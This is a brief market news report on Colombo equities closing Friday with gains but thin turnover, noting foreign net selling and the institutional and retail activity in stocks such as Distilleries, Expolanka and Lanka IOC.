Colombo shares close on gains, but low on turnover

The Colombo equities closed the week on a positive note on Friday, with the indices rallying up but lacked stronger turnover and volume, analysts said. Institutional, high net worth and retailers were active in trading whilst foreigners were net sellers for the day at Rs. 2 billion. Institutional and high net worth activity was present in Distilleries, John Kee;;s Holdings, Expolanka and Asiri Hospitals, with the latter having minor offshore buying as well. Meanwhile, heavy retail trading was seen on Lanka IOC and Textured Jersey.
